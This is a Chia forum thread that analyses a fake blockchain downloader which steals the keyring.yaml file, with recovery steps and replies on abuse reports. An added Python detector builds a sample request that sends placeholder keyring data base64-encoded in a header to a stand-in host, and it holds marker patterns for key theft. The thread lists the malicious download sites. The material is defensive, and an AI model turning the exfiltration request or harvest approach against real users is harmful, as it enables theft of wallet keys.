This program is stealing your private keys!

TLDR: If you used a downloader application from any of the sites listed below, your keys have been compromised. MOVE YOUR XCH IMMEDIATELY!!! Also, until you can get a new setup running, change your payout address to a cold wallet.

http://chiadb.co/
http://chiadatabase.info/
https://chiadownload.net/
https://chiafarmer.medium.com/

Now that the summary has been put out there, and the people in danger have run off to protect their assets, let’s get down to the details.

If anyone goes to one of the listed sites, it presents you with an option to download the chia database directly or download a MultiThreadDownloader that will help speed up the process.

But if you try to use the direct link to download the file, it is super slow and will disconnect repeatedly, pushing the user towards the .exe MultiThreadDownloader tool.

So we decided to dig into this “tool”. A quick dump of the exe shows a reference to <main.chia_keys+0xcb>. So this made us dig deeper.

Then another type of search through the exe dumps out a directory table that shows the files used to compile this program. This shows that the executable was created using the Go programming language and was compiled on Windows.

So, it’s time to fire this thing up and actually see what it is doing. With a monitoring tool running to see what it was accessing, I opened the exe and recorded its actions. And as suspected, it immediately accessed the keyring.yaml file.

This alone is enough to call this malicious malware. There is absolutely no reason at all that it would need access to anything on the end user’s computer, especially the key file for Chia. But let’s continue. Did it do anything with that information, or was opening that file just some mystical accident?

Let’s look into what the program is storing in memory.

Well look at that. The entire keyring file is now neatly stored in the downloader’s memory (the highlighted part is the beginning of the key and all the other lines are from the keyring file).

Of course this information is now in the hands of someone else that has every intention of taking your hard earned XCH.

If you ever used this piece of software, you really have no choice but to start over. Sorry.

  1. Move your XCH to a cold wallet (if it’s not already been stolen).
  2. Format your computer and reinstall the operating system.
  3. Load Chia from scratch and set up new mnemonics.
  4. Delete your old plots, and replot to the new mnemonic.
  5. Remember, safety first, always use a cold wallet, and official clients / database downloads.

Official Blockchain Torrent: Downloads - Chia Network

23 Likes

Great job analyzing it!

Not sure, but that keyring file shows that a password was not enabled for that setup, so yes, scammers have full access using that particular keyring and mnemonics. However, if a password had been added to that setup, having that keyring would maybe not let them access that wallet. Still, having that keyring would enable those scammers to run a brute force attack to potentially crack the password, so as you said, move your XCH asap.

However, once such a thing is on a box, I would assume that the #1 priority for them would be to install a trojan that would allow installation of an updated program in the future and use a different way to get mnemonics.

6 Likes

Thank you for the time you spent investigating this.

I think this will be the reason for the “massive hack” of the thousands of air gapped systems with their hot “cold wallets” that never used any third party software :wink:

This is exactly the attack vector.

Have a nice day everyone.

3 Likes

With a monitoring tool running to see what it is accessing. I opened the exe and recorded its actions.

Which program are you using?
Thanks

Great effort, thank you.
1. So the keyring file was always a problem. But now my question is: if we set a passphrase, can they get the password? (With the save passphrase option?)
2. I never used any download programs from that site, 100% sure about it, but downloaded the DB (only the db file). And yet, I got hacked. Which means this exploit probably is part of other ones, so I believe this is one part of the hack, but there are probably also other programs.
So I’m still suspicious about PlotManager.exe, the chia forks SIT, HDDcoin or maybe chives at some point (maybe in a specific version, one of the old versions), or Hpool.

1 Like

UPDATE

Another test was run to pin down how the information was sent. By intercepting the traffic of the exe, it was found. They are sending the keyring file information encoded in base64 in the header immediately once the program obtains the keyring information. This is all done before you even tell the program to begin the download of the database. (Note: the keyring info you see in this test is different from the previous tests because this is a totally different setup just to catch this piece of the puzzle.)

Here’s the intercepted HTTP request.

This image shows the header and then the decoded content.

WARNING!!!
This was suspected, but now we know. Just opening the program will trigger the keyring data to be taken and sent. You don’t even have to begin the download of the database. So DO NOT play around with this program!

11 Likes
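As an added illustration (not code from the thread or from the downloader itself), here is a Python check a defender could run over captured outbound requests to flag a header that carries a base64-encoded keyring or seed phrase, the behaviour the intercepted request above shows; the header name, the sample keyring layout and the marker strings are assumptions for this example.

```python
import base64
import re

# Assumed marker set for this example: strings suggesting a decoded header value
# is a wallet keyring, plus the 24-word shape of a BIP39 seed phrase.
KEYRING_MARKERS = ("keyring", "mnemonic", "wallet-user-chia", "keys:")
MNEMONIC_RE = re.compile(r"(?:\b[a-z]{3,8}\b[ \n]+){23}\b[a-z]{3,8}\b")
MIN_B64_LEN = 64  # shorter values (session tokens, Basic auth) are not a dump


def build_request(header_name, payload):
    # Raw HTTP/1.1 request with the payload base64-encoded into one header.
    encoded = base64.b64encode(payload.encode()).decode()
    return ("GET /blockchain_v1_mainnet.sqlite HTTP/1.1\r\n"
            "Host: downloader.example\r\n"
            f"{header_name}: {encoded}\r\n\r\n")

# Constructed sample: keyring-shaped YAML with placeholder values, sent on
# startup the way the thread's intercepted request shows (no real keys).
SAMPLE_KEYRING = "version: 1\nkeys:\n  wallet-user-chia-1.8-0000000000: placeholder-hex\n"
SAMPLE_REQUEST = build_request("X-Data", SAMPLE_KEYRING)


def parse_headers(raw_request):
    # {name: value} for the header lines of a raw HTTP/1.1 request.
    lines = raw_request.split("\r\n\r\n", 1)[0].split("\r\n")[1:]
    pairs = (line.split(":", 1) for line in lines if ":" in line)
    return {name.strip(): value.strip() for name, value in pairs}


def decode_if_base64(value):
    # Decoded bytes if value is strict base64 of dump-like size, else None.
    if len(value) < MIN_B64_LEN:
        return None
    try:
        return base64.b64decode(value, validate=True)
    except ValueError:  # binascii.Error is a ValueError subclass
        return None


def find_keyring_exfil(raw_request):
    # Flag headers whose base64 payload looks like a keyring or seed phrase.
    findings = []
    for name, value in parse_headers(raw_request).items():
        decoded = decode_if_base64(value)
        if decoded is None:
            continue
        text = decoded.decode("utf-8", errors="ignore").lower()
        hits = [m for m in KEYRING_MARKERS if m in text]
        if MNEMONIC_RE.search(text):
            hits.append("24-word mnemonic")
        if hits:
            findings.append((name, ", ".join(hits)))
    return findings
```

Feeding real proxy captures through find_keyring_exfil would surface the request the thread describes, because the keyring is sent before any download is requested.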

No fork has ever been proven yet to steal keys. The only one with potential was SIT which did a release without source code at one point. But no reports from that ever.

Even H-Pool, dodgy as that all is, does not have a clear, proven link to taking your keys.

Hey everyone,

To be clear, as long as you use the official chia client (not a cold wallet) and are NOT USING ANY 3RD PARTY STUFF, are you safe?

1 Like

Those three domains are controlled by godaddy.com. I have filed an abuse report with godaddy.com about it. Not sure whether godaddy will take action or not. Also, whether they do or not, those scammers will potentially register new names somewhere else, although having the official download from chia right now will potentially minimize the number of people using that service.

Here is the link to report it (as abuse) with godaddy if anyone would also like to do it (a clean start is at the bottom of the main page) - Domain Support

Maybe someone with medium.com account can report the fourth link from the first post.

4 Likes

Nice analysis @TJanik and thank you for taking the time to do that. Hopefully others will see this in the future and realize that the pre-synced chia blockchain download service’s multi-threaded file downloader is a scam before they lose their keys to it.

I previously owned chiadownload.net for a while but shut down the service due to costs and recently sold the domain on Afternic. It’s too bad it’s being used for this now.

I’ve been out of Chia for a while now. It’s good to see there’s an official chia database download available at Download - Chia Network now.

Again, thanks for posting your findings and detailed proof of what it does.

1 Like

All of the sites listed that hosted this malware are down (as of now). Not sure if the scammer took them down or if cloudflare did it. But the one that was on medium.com shows it was taken down and is under investigation.

1 Like

So, maybe it was worth reporting it to godaddy. I have to say that I didn’t believe that they would do anything. However, maybe there was a different trigger and that report just correlates with it.

Also, godaddy should have a CC payment that potentially can be traced back to a physical person (if that CC was not stolen, or was coming from a country that can be legally traced). I wonder whether godaddy reports such incidents / payment info to authorities.

Anyway, thanks to @TJanik for doing that research, as I provided a link to this thread when reporting and I assume that, if anything, that was the key factor.

6 Likes

Awesome work!! You have no idea how much this is helpful to me in general. A well presented deep dive with proper documentation.

I am so glad I used the official mainnet database torrent.

Thank you once again!

2 Likes

Isn’t that obvious from the start? Anybody knows that an .exe is a trap.

1 Like

I think it’s pretty obvious that’s not the case, as clearly people fell for it.

People really do need to learn to be careful, but we can all get caught out from time to time.

4 Likes

just ask Linus about it :rofl:

On a more serious note. Real safety is the ability to nuke your whole system and start again fresh without taking much damage.

1 Like

LMAO

  1. Linux backdoor open for 10 years - NSA-linked Bvp47 Linux backdoor widely undetected for 10 years
  2. Another one - RotaJakiro: A Linux backdoor that has flown under the radar for years | ZDNET

Just the 2 top results in a search for “backdoor in Linux”.

However, I have heard that NutOS has no vulnerabilities. :rofl:

I believe he was referring to LTT, but persistent backdoors are widely available in the wild, unfortunately more than anyone would care to believe.

1 Like

This backdoor wasn’t actually in the Linux kernel or in any Linux distribution, but was a Linux-based backdoor that was first detected in 2013. So, the reason it probably went under the radar for so many years was because it was a) very covert, and b) only planted on very few targeted systems through some other compromise. I didn’t look at the second one but would guess it is something similar.

A Discussion of Ken Thompson's "Reflections on Trusting Trust" seems fitting for this thread!

1 Like

It appears that the sites shilling this malware are not down; the owner of the site just began blocking a lot of regions to make it look that way. But it appears to be still live in at least China. So, if anyone here can repost this research in Chinese here or in locations that Chinese Chia farmers would find it, that would be great.

Also, if there are some Chinese farmers here, please report these sites to whatever authorities there are that can take them down. People are still getting hurt by this.

1 Like